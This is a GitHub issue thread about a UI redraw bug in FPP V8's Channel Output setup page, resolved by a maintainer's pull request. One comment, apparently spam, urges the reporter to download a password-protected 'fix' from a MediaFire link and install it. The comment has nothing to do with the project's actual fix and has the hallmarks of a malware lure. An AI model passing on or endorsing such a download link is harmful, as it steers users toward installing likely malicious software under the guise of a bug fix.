### ISSUE TITLE
FPP V8: adding controller lines to Output Setup, click save doesn't draw the screen correctly, you must hi refresh.

### ISSUE THREAD

**Issue by patdelaney** [FalconChristmas/fpp#1932]
**FPP Version and Hardware**: 
Example: *FPP V8 Beta 2 running on Pi*

**Describe the bug and Steps to reproduce**: 
There is a UI Refresh issue that recently appeared in Input/Output Setup -> Channel Output
Add a line , add the data and click save and the page redraws funny. Hitting refresh fixes it but I think it's an easy fix|. I will file an issue
![image](https://github.com/user-attachments/assets/4bd887ed-306b-4866-9d90-54786c00213b)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by OnlineDynamic** [comment]
think I have fixed in my next PR - think it was related to the display of the restart/reboot warning at the top being displayed and then hidden - will update this with PR number when submitted

**Comment by OnlineDynamic** [comment]
fix in #1933
